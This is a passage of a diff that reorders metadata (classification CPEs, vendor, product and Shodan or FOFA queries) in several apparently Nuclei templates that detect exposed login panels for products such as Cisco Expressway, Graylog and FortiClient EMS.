-    cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -23,7 +23,6 @@ http:
      - "{{BaseURL}}"

    stop-at-first-match: true
-
    host-redirects: true
    max-redirects: 2

@ -35,7 +34,9 @@ http:
          - "Cisco Unity Connection Administration"
          - ">Cisco Unity Connection</a>"
        condition: or
+
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml
+++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml
@ -8,16 +8,16 @@ info:
    CISCO Expressway login panel was detected.
  reference:
    - https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
+  classification:
+    cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: html:"Cisco Expressway"
-    product: expressway_software
    vendor: cisco
+    product: expressway_software
+    shodan-query: html:"Cisco Expressway"
  tags: panel,cisco,login,detect

-  classification:
-    cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -36,4 +36,5 @@ http:
        group: 1
        regex:
          - 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>'
-# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/craftercms-panel.yaml
+++ b/http/exposed-panels/craftercms-panel.yaml
@ -8,16 +8,16 @@ info:
    CrafterCMS login panel was detected.
  reference:
    - https://craftercms.org/
+  classification:
+    cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"craftercms"
-    product: craftercms
    vendor: craftercms
+    product: craftercms
+    shodan-query: http.title:"craftercms"
  tags: panel,craftercms,login,detect

-  classification:
-    cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -36,4 +36,5 @@ http:
        group: 1
        regex:
          - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
-# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/cyberchef-panel.yaml
+++ b/http/exposed-panels/cyberchef-panel.yaml
@ -8,16 +8,16 @@ info:
    A Cyber Chef Panel was detected
  reference:
    - https://cyberchef.org
+  classification:
+    cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"CyberChef"
-    product: cyberchef
    vendor: gchq
+    product: cyberchef
+    shodan-query: title:"CyberChef"
  tags: panel,cyberchef,login,detect

-  classification:
-    cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -38,4 +38,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/dialogic-xms-console.yaml
+++ b/http/exposed-panels/dialogic-xms-console.yaml
@ -4,16 +4,16 @@ info:
  name: Dialogic XMS Admin Console - Detect
  author: ritikchaddha
  severity: info
+  classification:
+    cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Dialogic XMS Admin Console"
-    product: powermedia_xms
    vendor: dialogic
+    product: powermedia_xms
+    shodan-query: title:"Dialogic XMS Admin Console"
  tags: panel,dialogic,admin,login,detect

-  classification:
-    cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/discuz-panel.yaml
+++ b/http/exposed-panels/discuz-panel.yaml
@ -4,17 +4,17 @@ info:
  name: Discuz Panel - Detection
  author: ritikchaddha
  severity: info
+  classification:
+    cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
+    vendor: comsenz
+    product: discuz\\!
    shodan-query: title:"Discuz!"
    fofa-query: title="Discuz!"
-    product: discuz\\!
-    vendor: comsenz
  tags: panel,discuz,detect,login

-  classification:
-    cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -39,4 +39,5 @@ http:
        group: 1
        regex:
          - '<em>X([0-9.]+)<\/em><\/p>'
-# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/dockge-panel.yaml
+++ b/http/exposed-panels/dockge-panel.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/louislam/dockge
    - https://dockge.kuma.pet/
+  classification:
+    cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Dockge"
-    product: dockge
    vendor: dockge.kuma
+    product: dockge
+    shodan-query: title:"Dockge"
  tags: panel,dockge,login

-  classification:
-    cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -36,4 +36,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/dokuwiki-panel.yaml
+++ b/http/exposed-panels/dokuwiki-panel.yaml
@ -8,16 +8,16 @@ info:
    Dokuwiki login panel was detected.
  reference:
    - https://www.dokuwiki.org/dokuwiki
+  classification:
+    cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.html:"/dokuwiki/"
-    product: dokuwiki
    vendor: dokuwiki
+    product: dokuwiki
+    shodan-query: http.html:"/dokuwiki/"
  tags: panel,dokuwiki,login

-  classification:
-    cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
          - 'status_code == 200'
          - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")'
        condition: and
-# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/doris-panel.yaml
+++ b/http/exposed-panels/doris-panel.yaml
@ -5,16 +5,16 @@ info:
  author: ritikchaddha
  severity: info
  description: Doris panel detection template.
+  classification:
+    cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:24048806
-    product: doris
    vendor: apache
+    product: doris
+    shodan-query: http.favicon.hash:24048806
  tags: doris,panel,login,detect

-  classification:
-    cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -32,4 +32,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/emqx-panel.yaml
+++ b/http/exposed-panels/emqx-panel.yaml
@ -8,16 +8,16 @@ info:
    EMQX login panel was detected.
  reference:
    - https://www.emqx.io/
+  classification:
+    cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"EMQX Dashboard"
-    product: emqx
    vendor: emqx
+    product: emqx
+    shodan-query: http.title:"EMQX Dashboard"
  tags: panel,emqx,login,detect

-  classification:
-    cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -36,4 +36,5 @@ http:
        group: 1
        regex:
          - 'but\s+(emqx\-dashboard[0-9a-z\-]+)'
-# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/endpoint-protector-panel.yaml
+++ b/http/exposed-panels/endpoint-protector-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    Endpoint Protector - Reporting and Administration Tool login panel was detected.
+  classification:
+    cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Endpoint Protector"
-    product: endpoint_protector
    vendor: cososys
+    product: endpoint_protector
+    shodan-query: http.title:"Endpoint Protector"
  tags: panel,endpoint,login,detect,endpoint-protector

-  classification:
-    cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -30,4 +30,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/fortinet/forticlientems-panel.yaml
+++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml
@ -4,16 +4,16 @@ info:
  name: FortiClient Endpoint Management Server Panel - Detect
  author: h4sh5
  severity: info
+  classification:
+    cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:-800551065
-    product: forticlient_endpoint_management_server
    vendor: fortinet
+    product: forticlient_endpoint_management_server
+    shodan-query: http.favicon.hash:-800551065
  tags: panel,fortinet,forticlient,ems,login,detect

-  classification:
-    cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -37,4 +37,5 @@ http:
        group: 1
        regex:
          - 'VERSION_FULL\\u0022: \\u0022(.*?)\\u0022'
-# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/fossbilling-panel.yaml
+++ b/http/exposed-panels/fossbilling-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    FOSSBilling panel has been detected.
+  classification:
+    cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"FOSSBilling"
-    product: fossbilling
    vendor: fossbilling
+    product: fossbilling
+    shodan-query: title:"FOSSBilling"
  tags: fossbilling,panel,detect

-  classification:
-    cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/freshrss-panel.yaml
+++ b/http/exposed-panels/freshrss-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    Freshrss panel has been detected.
-  metadata:
-    max-request: 1
-    verified: true
-    shodan-query: title:"Freshrss"
-    product: freshrss
-    vendor: freshrss
-  tags: freshrss,panel,detect
-
  classification:
    cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: freshrss
+    product: freshrss
+    shodan-query: title:"Freshrss"
+  tags: freshrss,panel,detect
+
 http:
  - method: GET
    path:
@ -38,4 +38,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/ghost-panel.yaml
+++ b/http/exposed-panels/ghost-panel.yaml
@ -8,16 +8,16 @@ info:
    Beautiful, modern publishing with email newsletters and paid subscriptions built-in.
  reference:
    - https://ghost.org/
+  classification:
+    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: app="Ghost"
-    product: ghost
    vendor: ghost
+    product: ghost
+    fofa-query: app="Ghost"
  tags: panel,ghost,login,detect

-  classification:
-    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -32,4 +32,5 @@ http:
          - 'content="Ghost"'
        condition: or
        case-insensitive: true
-# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/gradle/gradle-develocity-panel.yaml
+++ b/http/exposed-panels/gradle/gradle-develocity-panel.yaml
@ -7,16 +7,16 @@ info:
  description: Gradle Develocity Build Cache Node login panel was detected.
  reference:
    - https://gradle.com/gradle-enterprise-solutions/
-  metadata:
-    max-request: 1
-    verified: true
-    shodan-query: http.html:"Develocity Build Cache Node"
-    product: build_cache_node
-    vendor: gradle
-  tags: panel,gradle,detect,login
-
  classification:
    cpe: cpe:2.3:a:gradle:build_cache_node:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: gradle
+    product: build_cache_node
+    shodan-query: http.html:"Develocity Build Cache Node"
+  tags: panel,gradle,detect,login
+
 http:
  - method: GET
    path:
@ -35,4 +35,5 @@ http:
        group: 1
        regex:
          - '(?i)"applicationVersion":"([0-9.]+)"'
-# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/graylog-panel.yaml
+++ b/http/exposed-panels/graylog-panel.yaml
@ -8,16 +8,16 @@ info:
    Graylog login panel was detected.
  reference:
    - https://graylog.org/
+  classification:
+    cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Graylog Web Interface"
-    product: graylog
    vendor: graylog
+    product: graylog
+    shodan-query: http.title:"Graylog Web Interface"
  tags: panel,graylog,login,detect

-  classification:
-    cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
          - 'status_code == 200'
          - 'contains(body, "<title>Graylog Web Interface")'
        condition: and
-# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/ibm/ibm-odm-panel.yaml
+++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml
@ -9,17 +9,17 @@ info:
  reference:
    - https://www.ibm.com/docs/en/odm/8.12.0
    - https://www.ibm.com/products/operational-decision-manager
+  classification:
+    cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: title="Decision Center | Business Console"
-    shodan-query: http.title:"Decision Center | Business Console"
-    product: operational_decision_manager
    vendor: ibm
+    product: operational_decision_manager
+    shodan-query: http.title:"Decision Center | Business Console"
+    fofa-query: title="Decision Center | Business Console"
  tags: panel,ibm,login,detect,decision-center

-  classification:
-    cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -45,4 +45,5 @@ http:
        group: 1
        regex:
          - '(?i)"js/dist/([0-9.]+)/decisioncenter"'
-# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/isams-panel.yaml
+++ b/http/exposed-panels/isams-panel.yaml
@ -8,16 +8,16 @@ info:
    iSAMS was detected.
  reference:
    - https://www.isams.com/platform/the-platform
+  classification:
+    cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:-81573405
-    product: isams
    vendor: iris
+    product: isams
+    shodan-query: http.favicon.hash:-81573405
  tags: panel,isams,login

-  classification:
-    cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -45,4 +45,5 @@ http:
        group: 1
        regex:
          - 'Version&nbsp;([0-9\.]+)'
-# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/jsherp-boot-panel.yaml
+++ b/http/exposed-panels/jsherp-boot-panel.yaml
@ -4,16 +4,16 @@ info:
  name: JshERP Boot Panel - Detect
  author: DhiyaneshDk
  severity: info
+  classification:
+    cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:-1298131932
-    product: jsherp
    vendor: jishenghua
+    product: jsherp
+    shodan-query: http.favicon.hash:-1298131932
  tags: panel,jsherp,login,detect

-  classification:
-    cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -31,4 +31,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/kiali-panel.yaml
+++ b/http/exposed-panels/kiali-panel.yaml
@ -8,16 +8,16 @@ info:
    kiali panel was detected.
  reference:
    - https://kiali.io/
+  classification:
+    cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: title:"Kiali"
-    product: kiali
    vendor: kiali
+    product: kiali
+    shodan-query: title:"Kiali"
  tags: panel,kiali,detect,login

-  classification:
-    cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -40,4 +40,5 @@ http:
        group: 1
        regex:
          - '(?i)"Kiali version":\s*"([a-z0-9.]+)"'
-# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/koel-panel.yaml
+++ b/http/exposed-panels/koel-panel.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://koel.dev/
    - https://github.com/koel/koel
+  classification:
+    cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Koel"
-    product: koel
    vendor: koel
+    product: koel
+    shodan-query: title:"Koel"
  tags: panel,koel,login

-  classification:
-    cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -26,6 +26,7 @@ http:

    host-redirects: true
    max-redirects: 2
+
    matchers-condition: and
    matchers:
      - type: word
@ -37,4 +38,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/kopano-webapp-panel.yaml
+++ b/http/exposed-panels/kopano-webapp-panel.yaml
@ -7,16 +7,16 @@ info:
  description: Kopano WebApp login panel was detected.
  reference:
    - https://kopano.com/
+  classification:
+    cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Kopano WebApp"
-    product: webapp
    vendor: kopano
+    product: webapp
+    shodan-query: http.title:"Kopano WebApp"
  tags: panel,kopano,login,detect

-  classification:
-    cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -24,7 +24,6 @@ http:

    host-redirects: true
    max-redirects: 2
-
    matchers:
      - type: dsl
        dsl:
@ -38,4 +37,5 @@ http:
        group: 1
        regex:
          - '\?kv([0-9.]+)"'
-# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/label-studio-panel.yaml
+++ b/http/exposed-panels/label-studio-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    Detects the presence of the Label Studio Login Page.
+  classification:
+    cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:-1649949475
-    product: label_studio
    vendor: heartex
+    product: label_studio
+    shodan-query: http.favicon.hash:-1649949475
  tags: label-studio,login,panel

-  classification:
-    cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/librephotos-panel.yaml
+++ b/http/exposed-panels/librephotos-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  reference:
    - https://github.com/LibrePhotos/librephotos
+  classification:
+    cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:*
